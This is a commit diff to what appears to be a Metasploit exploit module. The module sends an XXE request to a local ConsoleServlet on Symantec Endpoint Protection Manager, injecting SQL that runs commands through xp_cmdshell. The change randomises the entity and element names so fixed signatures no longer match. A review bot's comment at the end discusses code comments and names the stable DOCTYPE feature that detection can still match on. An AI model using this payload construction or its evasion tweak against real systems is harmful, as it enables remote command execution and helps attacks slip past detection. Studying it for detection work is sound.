Added randomness instead of payload and xxe keywords

bug/bundler_fix
xistence 2014-02-25 15:23:10 +07:00
parent 4908d80d6c
commit ab167baf56
1 changed files with 5 additions and 3 deletions


@ -102,17 +102,19 @@ class Metasploit3 < Msf::Exploit::Remote
end
def soap_request(seqnum, command)
entity = "<!ENTITY payload SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
randpayload = rand_text_alpha(8+rand(8))
randxxe = rand_text_alpha(8+rand(8))
entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
xml = Document.new
xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
xml.add_element("Request")
xxe = xml.root.add_element("xxe")
xxe = xml.root.add_element(randxxe)
xxe.text = "PAYLOAD"
xml_s = xml.to_s
xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
xml_s.gsub!(/PAYLOAD/, "&payload;") # To avoid html encoding
xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
xml_s
end
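Review bot: The two new locals and the placeholder substitution in `soap_request` are undocumented, and the trailing comment `# To avoid html encoding` is inaccurate: what the gsub! calls sidestep is REXML escaping `&` and `<` when the document is serialized. I would put one comment above the first gsub!, for example `# REXML escapes markup in node text, so the entity declaration and reference are substituted after to_s`, and a short one on the `rand_text_alpha` lines saying the entity and element names are regenerated on every call. That second comment also matters to anyone deriving detection content from this module: after this change the literal names `payload` and `xxe` no longer appear in the request. The inline DOCTYPE `sepm`, which declares an external SYSTEM entity pointing at the local ConsoleServlet URL, is unchanged and is the stable feature to match on.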